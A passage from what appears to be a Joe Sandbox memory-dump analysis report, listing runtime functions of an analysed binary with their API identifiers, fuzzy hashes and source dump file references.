                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction ID: 03ecd5fe1a5bdb7f3577bdb0bd702417783f77af2fdc73317324dc2a620c926c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F45135B2F06612CAEB14EF6498516BC67A5BF00358F100276DD5E9AAF4DF3CA407D700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                • Instruction ID: 2316d53906b9179271611a72474b0e38a4515801f1f9f6cadb1b566dfd14a9f8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E518A32E09641CAFB10EF71D4543BD67A1BF48B58F14847ADE898B7A8DF78D4429320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                • Instruction ID: 20d4ef8098239df77655749c50c9030723abb80f17ebffbfe72c9684460e29ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E419032D19781C7E710AB219514379A2A0FB943A4F10937AE69C43BE2DF6CA1E29720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction ID: 9a2407f3bf8bdb4d5f30069b4adda1286f4b94b1db38f5de94a38e55ad617085
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27314931E0A203C1FE15BF24D4623B95681BF81384F4454F7DA4EC72E3DE2EA80AA211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction ID: ee591da5858ed80551de241809c39ecc10c29b57db939fd83bb3ebce91de88c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E951EC31B0B241C6F7A4B925940067EE691BF44BA4F1847B6DEED837E5CE3CD542A720
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction ID: 34949d68e923cbe95bae26c4ddbeddb1215e021ae6d3c77ce29e1120969cf8e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99110832608A81C1DA109B25B810069B361BB81FF0F544372EFBD877E5CE7CD416A700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE35839), ref: 00007FF6AAE35957
                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6AAE35839), ref: 00007FF6AAE3596D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                • Instruction ID: 997dd873cfa24d3ca9c1fdd8218fd71b846b78089e2cc6680853a4088d7dbb15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3118F7160D742C6EB54AB15A41113AF7A0FB84771F50027BF6EAC1AE8EF6CD416EB20
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction ID: 738c5ce8a845346fc6c943a6cb077463ecce4619856e2b043cd03ef54873d1fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DE08630F1B202C3FF157BF2A45513856947F88701F4440B2C95DD72B1DD2D6893A320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF6AAE3A9D5,?,?,00000000,00007FF6AAE3AA8A), ref: 00007FF6AAE3ABC6
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE3A9D5,?,?,00000000,00007FF6AAE3AA8A), ref: 00007FF6AAE3ABD0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction ID: 80fbb5839399179f9a0242a8a5019cd8ce8e905f73db904de2e3cb14e6916df9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F821DB31F1A682C1FA507751945437DA283BF84790F4442BBDA9EC77E1CE6EE4936310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction ID: 8d9011ed714bce13932c1fd56b981ad6360cc8fad053d6870693eb73857bcd25
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D41A13291A645C7EA24AA19A94027DB3A0FF55B80F101176DACFC36E1CF6DE443AB61
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                • Opcode ID: da1a8e51533ecb5b8508356eeb46dfa44f7e66167ed37cc52675a77ad0331743
                                                                                                                                                                                                                                • Instruction ID: eaa4f92098db5ceab421671e2924430a76dbedab0cc881e773f83c0052a21868
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da1a8e51533ecb5b8508356eeb46dfa44f7e66167ed37cc52675a77ad0331743
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF219131B1A692C6FE50BA226914BFA9641BF45BC4F8844B2EE4C87786CE7DE046D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction ID: 5fda741ed60c2f75a9b251f9c56737f9c01077fde5bd952a7e16aab3adea5f42
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C315E32A1A642C5E7117B55884137CA690BF80B95F4101B7EA9E873E2CF7CE443A721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction ID: f7344cb9e2ea76d4fe83949f507f37fda568359b35c207305bd7c9b88fd69068
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19118131A1E641C6EA60BF11940417DE2A4BF85B84F4444BBEACCD7BA6CF3DE4426730
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction ID: e1df05bef77a0fb708d5bf18142f250b14fbfa5615653f89c831f10b78bd0afe
